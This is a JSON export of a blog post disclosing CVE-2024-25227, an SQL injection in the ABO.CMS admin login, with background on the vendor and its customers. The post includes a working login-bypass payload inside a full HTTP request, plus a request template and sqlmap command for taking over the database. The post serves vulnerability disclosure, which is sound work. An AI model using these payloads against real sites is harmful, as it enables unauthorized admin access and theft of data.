{"id":101,"date":"2024-12-08T21:38:47","date_gmt":"2024-12-08T21:38:47","guid":{"rendered":"http:\/\/thetrueartist.co.uk\/?p=101"},"modified":"2025-01-14T15:10:29","modified_gmt":"2025-01-14T15:10:29","slug":"understanding-the-impact-of-cve-2024-25227-what-you-need-to-know-and-how-it-was-discovered","status":"publish","type":"post","link":"http:\/\/thetrueartist.co.uk\/index.php\/2024\/12\/08\/understanding-the-impact-of-cve-2024-25227-what-you-need-to-know-and-how-it-was-discovered\/","title":{"rendered":"Understanding the Impact of CVE-2024-25227: What You Need to Know and How It was Discovered"},"content":{"rendered":"\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p style=\"font-size:20px\">I will start by detailing the vulnerability for everyone interested in the specifics, and later discuss how I discovered it and some information about the vendor.<\/p>\n\n\n\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" style=\"font-size:42px\"><strong>ABO.CMS-Login-SQLi-CVE-2024-25227<\/strong><\/h2>\n\n\n\n<h2 class=\"wp-block-heading\" style=\"font-size:28px\">CVE-2024-25227<\/h2>\n\n\n\n<div class=\"wp-block-group has-black-color has-text-color has-link-color wp-elements-3dc58e387640997c0ae98cffa4447dcd\" style=\"font-size:18px\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<p id=\"pxdji78\"><strong>Date: 23\/02\/2024<\/strong><\/p>\n\n\n\n<p id=\"4pljh80\"><strong>Tested on ABO.CMS 5.8<\/strong><\/p>\n\n\n\n<p id=\"au9hu82\"><strong>Vendor: ABO.CMS<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"1nyf484\" style=\"font-size:18px\"><strong>Vendor URL: <u>https:\/\/abocms.ru<\/u><\/strong><\/h2>\n<\/div><\/div>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" style=\"font-size:24px\"><strong>Components affected<\/strong><\/h2>\n\n\n\n<p class=\"has-medium-font-size\">This vulnerability, found in the tb_login parameter of the admin login page, exposes the system to SQL injection attacks, allowing malicious actors to inject and execute arbitrary SQL queries.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"gywlk10242\" style=\"font-size:24px\"><strong>Type<\/strong><\/h2>\n\n\n\n<p id=\"3s47d17808\">Remote<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"s546v22532\" style=\"font-size:24px\"><strong>Implications<\/strong><\/h2>\n\n\n\n<p id=\"x1ahd3961\">The implications of this vulnerability can be critical. With various exploitation techniques at a would be attackers disposal, including: boolean-based blind, error-based, stacked queries, time-based blind, and union queries, attackers can potentially gain unauthorized access to sensitive information, manipulate data, and even take control of the underlying database server under certain conditions.<\/p>\n\n\n\n<p style=\"font-size:10px\"><code>A<s>l<\/s>l techniques I have verified work under this vulnerability:*<\/code><\/p>\n\n\n\n<p>As the vendor has not responded to my requests for the past 14+ days, I am sceptical that they will fix this vulnerability in a timely manner and I would personally switch CMS&#8217; until these vulnerabilities have been addressed and fixed (if possible.) Additionally, heightened vigilance and proactive monitoring are essential to detect and mitigate potential exploitation attempts before they escalate into significant security incidents if you continue to use this CMS.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"ar7a354556\" style=\"font-size:24px\"><strong>Test Environment<\/strong><\/h2>\n\n\n\n<p id=\"8zjea54558\">Furthermore, the details about the test environment&#8211;IIS 7.5\/8.5 with MSSQL Server 2008 RP2 SP3 and running ASPx, and PHP.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"7562v70551\" style=\"font-size:24px\"><strong>Severity and Impact on Users\/Clients<\/strong><\/h2>\n\n\n\n<p id=\"1g53253473\">As far as I can tell, this could have quite a big impact on clients of the CMS as from the developer:<\/p>\n\n\n\n<p id=\"cfdf165630\"><strong>&#8220;The system was chosen by more than 3,000 companies&#8221;<\/strong><\/p>\n\n\n\n<p id=\"gpn6t4968\"><strong>&#8220;Including: InvestBank, SvyazBank, Slavyansky Credit, Rossium Concern, AmiBank, Arktur, Moscow Department of Education, RegionInvestBank, Housing Finance Bank, Foreign Economic Information Portal, APC, Russian Standard Bank, BikeLand, Federal Bank for Innovation and Development, RoboForex, PiterGaz, MotoPlaneta, SDM-Bank, XportMedia, etc.&#8221;<\/strong><\/p>\n\n\n\n<p style=\"font-size:10px\">https:\/\/www.abocms.ru\/partners\/partner\/russia\/*<\/p>\n\n\n\n<p>It is frightening to see the potential impact, as one of the main attractions to this CMS was in part that its designed usage was for banks. To make this worse is that the vendor ensured it was secure and that &#8220;The coding standards and architecture used in development <strong>eliminate<\/strong> the appearance of <strong>vulnerabilities such as SQL injection<\/strong> or cross-site scripting.<\/p>\n\n\n\n<p id=\"xtddb37802\" style=\"font-size:20px\">&#8220;<em>ABO.CMS<\/em> &#8211;<strong> Secure web application!<\/strong>&#8220;<\/p>\n\n\n\n<p style=\"font-size:10px\">https:\/\/www.abocms.ru\/about\/security\/*<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"slfde73130\" style=\"font-size:24px\"><strong>Discovery<\/strong><\/h2>\n\n\n\n<p id=\"rh6ig77496\">I was originally perusing various content management systems (CMS) for potential vulnerabilities. <u>ABO.CM<\/u>S was interesting to me as the first Eastern European CMS that I had come across and its vastly differing use cases based on edition. It is the first time I had seen a CMS with tiers like it.<\/p>\n\n\n\n<p id=\"mw7em180729\">Once I had obtained a sample to <u>ABO.CM<\/u>S 5.8 I dived into its modules<\/p>\n\n\n\n<p id=\"msj20113\">and found an endpoint within an admin login module. I looked into the post form data and through some inspection found out that the &#8220;tb_login&#8221; parameter was in fact vulnerable to SQL injection. With this, I was able to gain admin on the underlying module on the website, and I could inject SQL using many different techniques as mentioned previously.<\/p>\n\n\n\n<p id=\"fl7g786921\">Here are some examples of the Post request with the vulnerable module (tb_login), the original request and the SQLi ridden request:<\/p>\n\n\n\n<p style=\"font-size:18px\"><strong>original request<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/login.aspx HTTP\/1.1\n\nHost: localhost\n\nAccept-Encoding: gzip, deflate\n\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/535.36 (KHTML, like Gecko) Chrome\/104.0.5735.134 Safari\/527.36\n\nConnection: close\n\nCache-Control: max-age=0\n\nCookie: ASP.NET_SessionId=asd123hstjj\n\nOrigin: http:\/\/localhost\n\nUpgrade-Insecure-Requests: 1\n\nReferer: http:\/\/ip\n\nContent-Type: application\/x-www-form-urlencoded\n\nContent-Length: 100\n\nVIEWSTATE=%2ASDkjdkjfkgajsslfk&amp;EVENTVALIDATION=%2;llkfopkorjaeitjru123&amp;tb_login=**USERNAME**&amp;tb_pwd=**PASSWORD**b_submit=+%C3+%D7+%CE+%C5+<\/code><\/pre>\n\n\n\n<p id=\"tsqlf143609\"><strong>altered request (SQLi)<\/strong><\/p>\n\n\n\n<p id=\"yfhnj12907\" style=\"font-size:16px\"><strong>(EXPLOIT to bypass the login authentication, grants you admin)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/login.aspx HTTP\/1.1\n\nHost: localhost\n\nAccept-Encoding: gzip, deflate\n\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/535.36 (KHTML, like Gecko) Chrome\/104.0.5735.134 Safari\/527.36\n\nConnection: close\n\nCache-Control: max-age=0\n\nCookie: ASP.NET_SessionId=asd123hstjj\n\nOrigin: http:\/\/localhost\n\nUpgrade-Insecure-Requests: 1\n\nReferer: http:\/\/ip\n\nContent-Type: application\/x-www-form-urlencoded\n\nContent-Length: 100\n\nVIEWSTATE=%2ASDkjdkjfkgajsslfk&amp;EVENTVALIDATION=%2;llkfopkorjaeitjru123&amp;tb_login=27872164'%20or%202579%3d2579--%20&amp;tb_pwd=hf%36nb4u%84X5&amp;b_submit=+%C3+%D7+%CE+%C5+<\/code><\/pre>\n\n\n\n<p>Here is the payload without URL encoding:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>27872164' or 2579=2579--<\/strong><\/code><\/pre>\n\n\n\n<p>With the modified request with the payload, you are telling the backend, placeholder &#8220;27872164&#8242;&#8221; is combined with a condition that always evaluates to true (&#8220;<strong>2579=2579<\/strong>&#8220;),<strong> <\/strong>and to comment the remainder of everything else out in the query with &#8220;&#8211;&#8221; as to ensure the modified query is injected. This effectively bypasses <em>any<\/em> and <em>all<\/em> authentication checks related to the &#8220;tb_login&#8221; field, allowing <strong>unauthenticated access<\/strong> to the control panel <strong>with admin<\/strong>.<\/p>\n\n\n\n<p id=\"tcnj4255956\">If you would like to do more to the underlying system, then you can use any one of these techniques as previously mentioned in conjunction with a tool like SQLmap to automate the process.<\/p>\n\n\n\n<p id=\"i8zyu320152\">Techniques I have vetted:<\/p>\n\n\n\n<p id=\"hsrgp323621\">Boolean-based blind, error-based, stacked queries, time-based blind, and union queries.<\/p>\n\n\n\n<p id=\"kf3so337215\">It is incredibly easy to do, and you can completely take over a system and its database with this.<\/p>\n\n\n\n<p id=\"oaij4495\">All you need to do create a file and take the request, add a &#8220;*&#8221; where the payload would be and sqlmap will do the rest:<\/p>\n\n\n\n<p id=\"odvon428770\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/login.aspx HTTP\/1.1\n\nHost: localhost\n\nAccept-Encoding: gzip, deflate\n\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/535.36 (KHTML, like Gecko) Chrome\/104.0.5735.134 Safari\/527.36\n\nConnection: close\n\nCache-Control: max-age=0\n\nCookie: ASP.NET_SessionId=asd123hstjj\n\nOrigin: http:\/\/localhost\n\nUpgrade-Insecure-Requests: 1\n\nReferer: http:\/\/%2Aip%2A\/image\/admin\/login.aspx?ReturnUrl=%2FImage%2FAdmin%2Fdefault.aspx\n\nContent-Type: application\/x-www-form-urlencoded\n\nContent-Length: 100\n\nVIEWSTATE=%2ASDkjdkjfkgajsslfk&amp;EVENTVALIDATION=%2;llkfopkorjaeitjru123&amp;tb_login=*&amp;tb_pwd=hf%36nb4u%84X5&amp;b_submit=+%C3+%D7+%CE+%C5+<\/code><\/pre>\n\n\n\n<p style=\"font-size:10px\"><em>request.txt*<\/em><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -r request.txt --batch --banner<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"950\" height=\"1093\" src=\"http:\/\/thetrueartist.co.uk\/wp-content\/uploads\/2024\/12\/image-1.png\" alt=\"\" class=\"wp-image-103\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" style=\"font-size:28px\"><strong>Who are ABO.CMS??<\/strong><\/h2>\n\n\n\n<p>Here is a little backstory on <u>ABO.CMS<\/u>, from the pieces I have been able to grasp together and translate.<\/p>\n\n\n\n<p style=\"font-size:28px\"><u>ABO.CMS<\/u><\/p>\n\n\n\n<p id=\"l9enq459550\">Our vendor is <a href=\"https:\/\/ABOCMS.ru\" rel=\"noreferrer noopener\" target=\"_blank\"><u>ABO.CMS<\/u><\/a>&nbsp;which was previously known as Armex BackOffice in the early 2000s:&#8221;A commercial<strong>&nbsp;content management system<\/strong>&nbsp;originally known as <strong>Armex<\/strong>&nbsp;BackOffice and developed by <strong>Armex<\/strong>&nbsp;in 2004.&#8221;&nbsp;&#8211; via EDSD &#8211; <a href=\"https:\/\/www.edsd.com\/portfolio\/technology\/abo-cms\" rel=\"noreferrer noopener\" target=\"_blank\">ABO CMS \u2013 creating web applications with modular architecture (<\/a><a href=\"http:\/\/edsd.com\" rel=\"noreferrer noopener\" target=\"_blank\">edsd.com<\/a><a href=\"https:\/\/www.edsd.com\/portfolio\/technology\/abo-cms\" rel=\"noreferrer noopener\" target=\"_blank\">)<\/a><\/p>\n\n\n\n<p id=\"myvya459566\" style=\"font-size:10px\">It appears to be a CMS mainly used in Russia and Eastern Europe, with many different editions that are built for slightly different functions:<\/p>\n\n\n\n<p id=\"4swql459568\" style=\"font-size:10px\"><em>Start ABO.CMS: Start The software product is designed to quickly create a website with minimal financial investment, which would allow you to present basic information about the company and its services. The product includes an installer, a system core and 6 software modules. Cost &#8211; 2,900 rubles.<\/em><\/p>\n\n\n\n<p id=\"guk2l459570\" style=\"font-size:10px\"><em>ABO.CMS: Promo ABO.CMS: Promo The software product is designed to support advertising campaigns to promote goods and services on the Internet.&nbsp;In the shortest possible time, you will be able to develop a website that will allow you to present the object of advertising in a dynamic and very detailed manner. The product includes an installer, a system core and 11 software modules. Cost &#8211; 5,900 rubles.<\/em><\/p>\n\n\n\n<p id=\"thpfh459572\" style=\"font-size:10px\"><em>CMS for creating online communities ABO.CMS: Community The editors allow you to create interesting and multifunctional information portals and online communities.&nbsp;The system&#8217;s capabilities allow users to make new acquaintances, communicate with each other, and create their own blogs and photo galleries.&nbsp;And much more. The product includes an installer, a system kernel and 18 software modules. Cost &#8211; 9,900 rubles.<\/em><\/p>\n\n\n\n<p id=\"d09zm459574\" style=\"font-size:10px\"><em>Content management system ABO.CMS: Corporate Using the editors to create a corporate website, you solve the problems of developing your company in the direction of openness, raising the overall level of service for your partners and clients. The product includes an installer, a system kernel and 22 software modules. Cost &#8211; 11,900 rubles.<\/em><\/p>\n\n\n\n<p id=\"0myjd459576\" style=\"font-size:10px\"><em>CMS for managing an online store ABO.CMS: Shop The editors ensure the creation of full-fledged and multi-profile online stores in which the purchasing process for customers will be not only useful, but also enjoyable. The product includes an installer, a system core and 14 software modules. Cost &#8211; 14,300 rubles.<\/em><\/p>\n\n\n\n<p id=\"vpqhf459578\" style=\"font-size:10px\"><em>ABO.CMS: Business ABO.CMS: Business The product version is intended for conducting comprehensive commercial and social activities on the Internet.&nbsp;It will allow your company to take into account all the subtleties and specifics of your business, making you a leader among your competitors. The product includes an installer, a system kernel and 26 software modules. Cost &#8211; 23,900 rubles.<\/em><\/p>\n\n\n\n<p>via &#8211; <a href=\"https:\/\/www.abocms.ru\/editions\/*\" target=\"_blank\" rel=\"noreferrer noopener\"><u>https:\/\/www.abocms.ru\/editions\/<\/u><\/a><\/p>\n\n\n\n<p>It appears to have quite a huge customer base, again, they quote 3000 companies use their software, many being in the banking sector. Of this, they state that &#8220;<em>The system is registered in the official register of Computer Programs of the Russian Agency for Patents and Trademarks<\/em>.&#8221; They share a picture with validation of this:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"582\" height=\"863\" src=\"http:\/\/thetrueartist.co.uk\/wp-content\/uploads\/2024\/12\/image-2.png\" alt=\"\" class=\"wp-image-104\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/www.abocms.ru\/files\/images\/register_small1.jpg\" target=\"_blank\" rel=\"noopener\">https:\/\/www.abocms.ru\/files\/images\/register_small1.jpg<\/a><\/p>\n\n\n\n<p id=\"xmmbo459592\"><u>It&nbsp;even has a user manual!<\/u><\/p>\n\n\n\n<p id=\"vbdna459595\">via &#8211;<a href=\"https:\/\/www.abocms.ru\/about\/\" rel=\"noreferrer noopener\" target=\"_blank\"><u>https:\/\/www.abocms.ru\/about\/<\/u><\/a><\/p>\n\n\n\n<p id=\"dr2nl498286\">The official CVE entry from Mitre is here, as well as my more formal github documentation:<\/p>\n\n\n\n<p><a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2024-25227\" target=\"_blank\" rel=\"noopener\">https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2024-25227<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/thetrueartist\/ABO.CMS-Login-SQLi-CVE-2024-25227\/tree\/main\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/thetrueartist\/ABO.CMS-Login-SQLi-CVE-2024-25227\/tree\/main<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/thetrueartist\/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227\/tree\/main\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/thetrueartist\/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227\/tree\/main<\/a><\/p>\n\n\n\n<p>Thanks for reading! &#8211;TTA<\/p>\n\n\n\n<p style=\"font-size:10px\"> <em>(repost from: <a href=\"https:\/\/thetrueartist.wixsite.com\/cveblog\/\" target=\"_blank\" rel=\"noopener\">https:\/\/thetrueartist.wixsite.com\/cveblog\/<\/a>)<\/em><\/p>\n\n\n","protected":false},"excerpt":{"rendered":"<p>I will start by detailing the vulnerability for everyone interested in the specifics, and later discuss how I discovered it and some information about the vendor. ABO.CMS-Login-SQLi-CVE-2024-25227 CVE-2024-25227 Date: 23\/02\/2024 Tested on ABO.CMS 5.8 Vendor: ABO.CMS Vendor URL: https:\/\/abocms.ru Components affected This vulnerability, found in the tb_login parameter of the admin login page, exposes the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":117,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-101","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerability-research"],"_links":{"self":[{"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/posts\/101","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/comments?post=101"}],"version-history":[{"count":20,"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/posts\/101\/revisions"}],"predecessor-version":[{"id":364,"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/posts\/101\/revisions\/364"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/media\/117"}],"wp:attachment":[{"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/media?parent=101"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/categories?post=101"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/thetrueartist.co.uk\/index.php\/wp-json\/wp\/v2\/tags?post=101"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}